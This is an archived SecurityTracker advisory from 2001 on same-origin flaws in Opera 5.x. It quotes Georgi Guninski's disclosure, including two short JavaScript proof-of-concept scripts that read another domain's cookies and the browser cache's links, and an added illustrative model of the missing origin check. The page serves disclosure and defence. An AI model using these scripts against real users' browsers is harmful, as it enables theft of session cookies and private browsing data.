SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Opera
Vendors:   Opera Software
Opera Web Browser May Disclose Web Pages, Cookies, and Links from a Separate Domain to a Remote Server Running Malicious Javascript Code
SecurityTracker Alert ID:  1002759
SecurityTracker URL:  http://securitytracker.com/id/1002759
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 15 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): Opera 5.12/Windows, Opera 5.0/Linux; other versions may be affected
Description:   Georgi Guninski reported several vulnerabilities in the Opera web browser. Malicious JavaScript can access pages that the user can view, as well as the user's cookies and links.

A remote user can place malicious JavaScript in a web page that, when accessed by the target user, can access web pages in a different domain that the user can view (pages that may otherwise have required authentication). The JavaScript may also access the target user's cookies and links from arbitrary domains.

The browser reportedly also allows malicious JavaScript to access the links in the user's cache and history.

Some demonstration exploit code is included in the Source Message.

Impact:   A remote user can place malicious JavaScript in a web page that, when accessed by the target user, can access content, cookies, and links on behalf of the target user.
Solution:   No solution was available at the time of this entry. The author of the report recommends disabling Javascript on the Opera browser.
Vendor URL:  www.opera.com/
Cause:   Access control error
Underlying OS:  Linux (Any), Windows (Any)
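
The access control error named above is a missing same-origin check on handles to other windows. The following Node.js model of that check is an added illustration, not code from the advisory or from Opera; guardedHandle, tryRead, the attacker.example accessor page and the cookie value are hypothetical or constructed.

```javascript
// Serialised origin (scheme://host[:port]) or null for opaque origins.
function originOf(url) {
  try {
    const o = new URL(url).origin;
    return o === "null" ? null : o; // about:, data:, file: serialise as "null"
  } catch {
    return null; // unparsable URL: treat as opaque
  }
}

// Two URLs are same-origin only if both have a real origin and they match.
function sameOrigin(accessorUrl, targetUrl) {
  const a = originOf(accessorUrl);
  const t = originOf(targetUrl);
  return a !== null && t !== null && a === t; // opaque origins match nothing
}

// Model of the handle window.open() returns: every read of a protected
// property is checked against the accessor's origin at access time, so the
// check still holds if the target window navigates after it was opened.
function guardedHandle(accessorUrl, target) {
  const PROTECTED = new Set(["document", "history"]);
  return new Proxy(target, {
    get(obj, prop) {
      if (PROTECTED.has(prop) && !sameOrigin(accessorUrl, obj.location)) {
        throw new Error("SecurityError: cross-origin access to " + String(prop));
      }
      return obj[prop];
    },
  });
}

// Constructed sample data; attacker.example is a hypothetical accessor page.
const ACCESSOR = "http://attacker.example/page.html";

function tryRead(targetUrl) {
  const win = {
    location: targetUrl,
    document: { cookie: "session=constructed", links: [] },
  };
  try {
    guardedHandle(ACCESSOR, win).document.cookie;
    return "allowed";
  } catch (e) {
    return "blocked";
  }
}
```

With this check in place, reads of document properties in the http://mail.yahoo.com and about:cache windows from the accessor page are refused, while a page on the accessor's own origin remains readable.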

Message History:   This archive entry has one or more follow-up message(s) listed below.
(A User Provides Additional Details) Re: Opera Web Browser May Disclose Web Pages, Cookies, and Links from a Separate Domain to a Remote Server Running Malicious Javascript Code
A user has provided additional exploit details.



 Source Message Contents

Subject:  Several javascript vulnerabilities in Opera


Georgi Guninski security advisory #51, 2001

Several javascript vulnerabilities in Opera

Systems affected:
Opera 5.12/Windows, Opera 5.0/Linux - probably other versions

Risk: Medium
Date: 15 November 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true based on
experiments though it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Announcement:
I am looking for contracts in the security area - check http://www.guninski.com

Description:
Opera is a multiplatform web browser.
There are several javascript vulnerabilities in it, basically allowing
script in a page to access a page and its properties in another domain -
AFAIK Netscape calls this "Same Origin Vulnerability".
It is possible for a script in a web page to access at least cookies and links
in arbitrary domains to which the user has access.
It is also possible for a script to read the links in the user's cache and
history, which at least has privacy implications if not more.
In some cases cookies and links in the cache/history may contain sensitive information
such as usernames/passwords etc.


Details:
Examine the following scripts:
-1.----------------------------------
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
a.document.close();
}
setTimeout("f()",5000);
-----------------------------------

-2.--------------------------------
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------

In addition the HotJava exploit at http://www.guninski.com/hotjava1-desc.html works as
Jay@InfoAve.net pointed out.

Workaround:
Disable javascript (Opera suggests enabling "Use cookies to trace password protected documents")

Vendor status:
The vendor was notified on 5 November 2001 and was asked whether a fix shall be issued and when.
The reply was:
------------------------------------
You should be able to resolve the cookie issue by enabling "Use cookies to trace password protected documents", 
which means that pages with password protection aren't cached, cookies aren't stored, 
the URL shouldn't be displayed in History, etc. 
This is a "paranoia" option, and makes a few pages unusable.
As you are probably aware, many web technologies aren't very secure, 
but it is inconvenient for the user to block these. 
This is why the user should be given a choice to block privacy related information.
------------------------------------

Regards,
Georgi Guninski
http://www.guninski.com

 
 



Copyright 2021, SecurityGlobal.net LLC